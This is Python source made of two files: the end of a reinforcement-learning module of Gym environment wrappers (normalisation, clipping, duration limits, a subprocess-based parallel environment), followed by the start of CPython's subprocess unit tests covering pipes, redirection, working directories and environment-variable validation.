return observ, reward, done, info
def reset(self):
observ = self._env.reset()
self._buffer = np.repeat(observ[None, ...], self._capacity, 0)
self._step = 0
return self._select_frames()
def _select_frames(self):
indices = [(self._step - index) % self._capacity for index in self._past_indices]
observ = self._buffer[indices]
if self._flatten:
observ = np.reshape(observ, (-1,) + observ.shape[2:])
return observ
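# Shape note: observation_space gains a leading axis of length len(past_indices); with
# flatten=True that axis is instead folded into the first observation dimension.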
class FrameDelta(object):
"""Convert the observation to a difference from the previous observation."""
def __init__(self, env):
self._env = env
self._last = None
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
low = self._env.observation_space.low
high = self._env.observation_space.high
low, high = low - high, high - low
return gym.spaces.Box(low, high)
def step(self, action):
observ, reward, done, info = self._env.step(action)
delta = observ - self._last
self._last = observ
return delta, reward, done, info
def reset(self):
observ = self._env.reset()
self._last = observ
return observ
class RangeNormalize(object):
"""Normalize the specialized observation and action ranges to [-1, 1]."""
def __init__(self, env, observ=None, action=None):
self._env = env
self._should_normalize_observ = (observ is not False and
self._is_finite(self._env.observation_space))
if observ is True and not self._should_normalize_observ:
raise ValueError('Cannot normalize infinite observation range.')
if observ is None and not self._should_normalize_observ:
tf.logging.info('Not normalizing infinite observation range.')
self._should_normalize_action = (action is not False and
self._is_finite(self._env.action_space))
if action is True and not self._should_normalize_action:
raise ValueError('Cannot normalize infinite action range.')
if action is None and not self._should_normalize_action:
tf.logging.info('Not normalizing infinite action range.')
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
space = self._env.observation_space
if not self._should_normalize_observ:
return space
return gym.spaces.Box(-np.ones(space.shape), np.ones(space.shape))
@property
def action_space(self):
space = self._env.action_space
if not self._should_normalize_action:
return space
return gym.spaces.Box(-np.ones(space.shape), np.ones(space.shape))
def step(self, action):
if self._should_normalize_action:
action = self._denormalize_action(action)
observ, reward, done, info = self._env.step(action)
if self._should_normalize_observ:
observ = self._normalize_observ(observ)
return observ, reward, done, info
def reset(self):
observ = self._env.reset()
if self._should_normalize_observ:
observ = self._normalize_observ(observ)
return observ
def _denormalize_action(self, action):
min_ = self._env.action_space.low
max_ = self._env.action_space.high
action = (action + 1) / 2 * (max_ - min_) + min_
return action
def _normalize_observ(self, observ):
min_ = self._env.observation_space.low
max_ = self._env.observation_space.high
observ = 2 * (observ - min_) / (max_ - min_) - 1
return observ
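# Worked example for the two mappings above: with low=0 and high=10, an observation of
# 7.5 normalizes to 2 * 7.5 / 10 - 1 = 0.5, and a normalized action of -1 denormalizes
# back to (−1 + 1) / 2 * 10 + 0 = 0.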
def _is_finite(self, space):
return np.isfinite(space.low).all() and np.isfinite(space.high).all()
class ClipAction(object):
"""Clip out of range actions to the action space of the environment."""
def __init__(self, env):
self._env = env
def __getattr__(self, name):
return getattr(self._env, name)
@property
def action_space(self):
shape = self._env.action_space.shape
return gym.spaces.Box(-np.inf * np.ones(shape), np.inf * np.ones(shape))
def step(self, action):
action_space = self._env.action_space
action = np.clip(action, action_space.low, action_space.high)
return self._env.step(action)
class LimitDuration(object):
"""End episodes after specified number of steps."""
def __init__(self, env, duration):
self._env = env
self._duration = duration
self._step = None
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
if self._step is None:
raise RuntimeError('Must reset environment.')
observ, reward, done, info = self._env.step(action)
self._step += 1
if self._step >= self._duration:
done = True
self._step = None
return observ, reward, done, info
def reset(self):
self._step = 0
return self._env.reset()
class ExternalProcess(object):
"""Step environment in a separate process for lock free paralellism."""
# Message types for communication via the pipe.
_ACTION = 1
_RESET = 2
_CLOSE = 3
_ATTRIBUTE = 4
_TRANSITION = 5
_OBSERV = 6
_EXCEPTION = 7
_VALUE = 8
def __init__(self, constructor):
"""Step environment in a separate process for lock free paralellism.
The environment will be created in the external process by calling the
specified callable. This can be an environment class, or a function
creating the environment and potentially wrapping it. The returned
environment should not access global variables.
Args:
constructor: Callable that creates and returns an OpenAI gym environment.
Attributes:
observation_space: The cached observation space of the environment.
action_space: The cached action space of the environment.
"""
self._conn, conn = multiprocessing.Pipe()
self._process = multiprocessing.Process(target=self._worker, args=(constructor, conn))
atexit.register(self.close)
self._process.start()
self._observ_space = None
self._action_space = None
@property
def observation_space(self):
if not self._observ_space:
self._observ_space = self.__getattr__('observation_space')
return self._observ_space
@property
def action_space(self):
if not self._action_space:
self._action_space = self.__getattr__('action_space')
return self._action_space
def __getattr__(self, name):
"""Request an attribute from the environment.
Note that this involves communication with the external process, so it can
be slow.
Args:
name: Attribute to access.
Returns:
Value of the attribute.
"""
self._conn.send((self._ATTRIBUTE, name))
return self._receive(self._VALUE)
def step(self, action, blocking=True):
"""Step the environment.
Args:
action: The action to apply to the environment.
blocking: Whether to wait for the result.
Returns:
Transition tuple when blocking, otherwise callable that returns the
transition tuple.
"""
self._conn.send((self._ACTION, action))
if blocking:
return self._receive(self._TRANSITION)
else:
return functools.partial(self._receive, self._TRANSITION)
def reset(self, blocking=True):
"""Reset the environment.
Args:
blocking: Whether to wait for the result.
Returns:
New observation when blocking, otherwise callable that returns the new
observation.
"""
self._conn.send((self._RESET, None))
if blocking:
return self._receive(self._OBSERV)
else:
return functools.partial(self._receive, self._OBSERV)
def close(self):
"""Send a close message to the external process and join it."""
try:
self._conn.send((self._CLOSE, None))
self._conn.close()
except IOError:
# The connection was already closed.
pass
self._process.join()
def _receive(self, expected_message):
"""Wait for a message from the worker process and return its payload.
Args:
expected_message: Type of the expected message.
Raises:
Exception: An exception was raised inside the worker process.
KeyError: The received message is not of the expected type.
Returns:
Payload object of the message.
"""
message, payload = self._conn.recv()
# Re-raise exceptions in the main process.
if message == self._EXCEPTION:
stacktrace = payload
raise Exception(stacktrace)
if message == expected_message:
return payload
raise KeyError('Received message of unexpected type {}'.format(message))
def _worker(self, constructor, conn):
"""The process waits for actions and sends back environment results.
Args:
constructor: Constructor for the OpenAI Gym environment.
conn: Connection for communication to the main process.
"""
try:
env = constructor()
while True:
try:
# Only block for short times so that keyboard interrupts can still be raised.
if not conn.poll(0.1):
continue
message, payload = conn.recv()
except (EOFError, KeyboardInterrupt):
break
if message == self._ACTION:
action = payload
conn.send((self._TRANSITION, env.step(action)))
continue
if message == self._RESET:
assert payload is None
conn.send((self._OBSERV, env.reset()))
continue
if message == self._ATTRIBUTE:
name = payload
conn.send((self._VALUE, getattr(env, name)))
continue
if message == self._CLOSE:
assert payload is None
break
raise KeyError('Received message of unknown type {}'.format(message))
except Exception: # pylint: disable=broad-except
stacktrace = ''.join(traceback.format_exception(*sys.exc_info()))
conn.send((self._EXCEPTION, stacktrace))
tf.logging.error('Error in environment process: {}'.format(stacktrace))
conn.close()
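# ExternalProcess is typically used to run several simulators in parallel:
# send every action with blocking=False, then resolve the returned callables
# to collect the transitions.  A hedged sketch; the constructors and actions
# are supplied by the caller and nothing below is specific to this module:
def _example_external_processes(constructors, actions):
    envs = [ExternalProcess(constructor) for constructor in constructors]
    observs = [env.reset() for env in envs]
    promises = [env.step(action, blocking=False)       # returns a callable, not a tuple
                for env, action in zip(envs, actions)]
    transitions = [promise() for promise in promises]  # blocks here, one env at a time
    for env in envs:
        env.close()
    return observs, transitions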
class ConvertTo32Bit(object):
"""Convert data types of an OpenAI Gym environment to 32 bit."""
def __init__(self, env):
"""Convert data types of an OpenAI Gym environment to 32 bit.
Args:
env: OpenAI Gym environment.
"""
self._env = env
def __getattr__(self, name):
"""Forward unimplemented attributes to the original environment.
Args:
name: Attribute that was accessed.
Returns:
Value behind the attribute name in the wrapped environment.
"""
return getattr(self._env, name)
def step(self, action):
"""Forward action to the wrapped environment.
Args:
action: Action to apply to the environment.
Raises:
ValueError: Invalid action.
Returns:
Converted observation, converted reward, done flag, and info object.
"""
observ, reward, done, info = self._env.step(action)
observ = self._convert_observ(observ)
reward = self._convert_reward(reward)
return observ, reward, done, info
def reset(self):
"""Reset the environment and convert the resulting observation.
Returns:
Converted observation.
"""
observ = self._env.reset()
observ = self._convert_observ(observ)
return observ
def _convert_observ(self, observ):
"""Convert the observation to 32 bits.
Args:
observ: Numpy observation.
Raises:
ValueError: Observation contains infinite values.
Returns:
Numpy observation with 32-bit data type.
"""
if not np.isfinite(observ).all():
raise ValueError('Infinite observation encountered.')
if observ.dtype == np.float64:
return observ.astype(np.float32)
if observ.dtype == np.int64:
return observ.astype(np.int32)
return observ
def _convert_reward(self, reward):
"""Convert the reward to 32 bits.
Args:
reward: Numpy reward.
Raises:
ValueError: Rewards contain infinite values.
Returns:
Numpy reward with 32-bit data type.
"""
if not np.isfinite(reward).all():
raise ValueError('Infinite reward encountered.')
return np.array(reward, dtype=np.float32)
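# ConvertTo32Bit is usually the outermost wrapper so that the learner only
# sees float32/int32 data.  A hedged sketch of a constructor that could be
# handed to ExternalProcess (the environment id is illustrative and assumes
# gym is installed; it is not required by this module):
def _example_constructor():
    import gym
    env = gym.make('Pendulum-v0')  # illustrative id; any continuous-control task works
    env = ClipAction(env)          # out-of-range actions are clipped rather than rejected
    env = LimitDuration(env, 200)  # force `done` after at most 200 steps
    env = ConvertTo32Bit(env)      # cast observations and rewards to 32-bit types
    return env
# For example, ExternalProcess(_example_constructor) would build this stack
# inside the worker process.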
|
test_subprocess.py
|
import unittest
from unittest import mock
from test import support
import subprocess
import sys
import platform
import signal
import io
import os
import errno
import tempfile
import time
import selectors
import sysconfig
import select
import shutil
import threading
import gc
import textwrap
try:
import ctypes
except ImportError:
ctypes = None
else:
import ctypes.util
try:
import _testcapi
except ImportError:
_testcapi = None
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
NONEXISTING_CMD = ('nonexisting_i_hope',)
# Ignore errors that indicate the command was not found
NONEXISTING_ERRORS = (FileNotFoundError, NotADirectoryError, PermissionError)
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(subprocess._active, "subprocess._active not empty")
self.doCleanups()
support.reap_children()
def assertStderrEqual(self, stderr, expected, msg=None):
# In a debug build, stuff like "[6580 refs]" is printed to stderr at
# shutdown time. That frustrates tests trying to check stderr produced
# from a spawned Python process.
actual = support.strip_python_stderr(stderr)
# strip_python_stderr also strips whitespace, so we do too.
expected = expected.strip()
self.assertEqual(actual, expected, msg)
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(0)"])
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises(NONEXISTING_ERRORS,
self._assert_python, pre_args,
executable=NONEXISTING_CMD[0])
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
with support.change_cwd(cwd):
return os.getcwd()
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"sys.stdout.write(os.getcwd()); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode("utf-8")))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
def test_cwd_with_pathlike(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
class _PathLikeObj:
def __fspath__(self):
return temp_dir
self._assert_cwd(temp_dir, sys.executable, cwd=_PathLikeObj())
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with support.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
with p:
self.assertStderrEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertStderrEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"strawberry")
def test_stderr_redirect_with_no_stdout_redirect(self):
# test stderr=STDOUT while stdout=None (not set)
# - grandchild prints to stderr
# - child redirects grandchild's stderr to its stdout
# - the parent should get grandchild's stderr in child's stdout
p = subprocess.Popen([sys.executable, "-c",
'import sys, subprocess;'
'rc = subprocess.call([sys.executable, "-c",'
' "import sys;"'
' "sys.stderr.write(\'42\')"],'
' stderr=subprocess.STDOUT);'
'sys.exit(rc)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
# NOTE: stdout should get stderr from grandchild
self.assertStderrEqual(stdout, b'42')
self.assertStderrEqual(stderr, b'') # should be empty
self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
with p:
self.assertStderrEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') == 1,
'The Python shared library cannot be loaded '
'with an empty environment.')
def test_empty_env(self):
"""Verify that env={} is as empty as possible."""
def is_env_var_to_ignore(n):
"""Determine if an environment variable is under our control."""
# This excludes some __CF_* and VERSIONER_* keys MacOS insists
# on adding even when the environment in exec is empty.
# Gentoo sandboxes also force LD_PRELOAD and SANDBOX_* to exist.
return ('VERSIONER' in n or '__CF' in n or # MacOS
'__PYVENV_LAUNCHER__' in n or # MacOS framework build
n == 'LD_PRELOAD' or n.startswith('SANDBOX') or # Gentoo
n == 'LC_CTYPE') # Locale coercion triggered
with subprocess.Popen([sys.executable, "-c",
'import os; print(list(os.environ.keys()))'],
stdout=subprocess.PIPE, env={}) as p:
stdout, stderr = p.communicate()
child_env_names = eval(stdout.strip())
self.assertIsInstance(child_env_names, list)
child_env_names = [k for k in child_env_names
if not is_env_var_to_ignore(k)]
self.assertEqual(child_env_names, [])
def test_invalid_cmd(self):
# null character in the command name
cmd = sys.executable + '\0'
with self.assertRaises(ValueError):
subprocess.Popen([cmd, "-c", "pass"])
# null character in the command argument
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass#\0"])
def test_invalid_env(self):
# null character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT\0VEGETABLE"] = "cabbage"
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass"], env=newenv)
# null character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange\0VEGETABLE=cabbage"
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass"], env=newenv)
# equal character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT=ORANGE"] = "lemon"
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass"], env=newenv)
# equal character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange=lemon"
with subprocess.Popen([sys.executable, "-c",
'import sys, os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
